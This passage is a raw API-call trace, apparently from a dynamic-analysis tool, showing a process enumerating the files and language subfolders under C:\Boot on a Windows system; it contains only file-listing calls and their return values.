FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BCD", cchWideChar=-1, lpMultiByteStr=0x326e790, cbMultiByte=260, lpDefaultChar=0x326df6f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCD", lpUsedDefaultChar=0x0) returned 4 [0119.496] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BCD.LOG", cchWideChar=-1, lpMultiByteStr=0x326e790, cbMultiByte=260, lpDefaultChar=0x326df6f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCD.LOG", lpUsedDefaultChar=0x0) returned 8 [0119.496] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BCD.LOG1", cchWideChar=-1, lpMultiByteStr=0x326e790, cbMultiByte=260, lpDefaultChar=0x326df6f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCD.LOG1", lpUsedDefaultChar=0x0) returned 9 [0119.496] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BCD.LOG2", cchWideChar=-1, lpMultiByteStr=0x326e790, cbMultiByte=260, lpDefaultChar=0x326df6f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCD.LOG2", lpUsedDefaultChar=0x0) returned 9 [0119.496] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BOOTSTAT.DAT", cchWideChar=-1, lpMultiByteStr=0x326e790, cbMultiByte=260, lpDefaultChar=0x326df6f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BOOTSTAT.DAT", lpUsedDefaultChar=0x0) returned 13 [0119.497] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.497] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.498] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.498] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.498] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.498] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.499] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.499] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.499] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.499] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.499] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.499] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.499] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.499] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.499] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.499] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.500] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.500] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.500] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.500] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.500] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.500] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.500] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.501] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.501] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.501] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.501] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.501] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.501] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.501] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.501] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.501] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.502] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.502] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.502] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.502] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.502] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.502] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.502] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.502] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.503] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.503] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.503] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.503] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.503] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.503] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.503] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.503] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.503] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.503] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.503] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.503] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.503] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.504] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.504] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.504] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="chs_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chs_boot.ttf", lpUsedDefaultChar=0x0) returned 13 [0119.504] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cht_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cht_boot.ttf", lpUsedDefaultChar=0x0) returned 13 [0119.504] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="jpn_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jpn_boot.ttf", lpUsedDefaultChar=0x0) returned 13 [0119.504] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="kor_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kor_boot.ttf", lpUsedDefaultChar=0x0) returned 13 [0119.504] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wgl4_boot.ttf", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wgl4_boot.ttf", lpUsedDefaultChar=0x0) returned 14 [0119.504] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.504] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.504] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.504] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.505] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.505] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.505] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.505] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.505] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.505] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.505] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.506] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.506] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.506] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.506] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.506] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.506] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.506] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.507] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.507] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.507] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.507] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.507] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.507] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.507] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.507] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.507] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.507] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.507] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.507] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.507] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.507] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.507] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.508] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.508] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.508] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.508] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.508] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.508] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memtest.exe", cchWideChar=-1, lpMultiByteStr=0x326e790, cbMultiByte=260, lpDefaultChar=0x326df6f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe", lpUsedDefaultChar=0x0) returned 12 [0119.508] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.508] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.508] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.509] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.509] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.509] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.509] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.509] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.512] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.512] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.512] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.512] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.512] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.512] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.512] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.513] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.513] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.513] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.513] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.513] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.513] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.513] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.513] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.513] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.514] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.514] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.514] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.514] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.514] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.514] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.514] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.514] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.514] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.514] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.514] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.514] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.514] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.515] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.515] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.515] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.515] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.515] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.515] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.515] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.515] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.516] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0119.516] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.516] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0119.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x326da00, cbMultiByte=260, lpDefaultChar=0x326d1df, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 16 [0119.516] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0 [0119.516] FindClose (in: hFindFile=0x284d4a8 | out: hFindFile=0x284d4a8) returned 1 [0119.516] FindNextFileW (in: hFindFile=0x284d3a8, lpFindFileData=0x326dc88 | out: lpFindFileData=0x326dc88) returned 1 [0119.516] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 0x284d4a8 [0119.517] GetDriveTypeA (lpRootPathName="C") returned 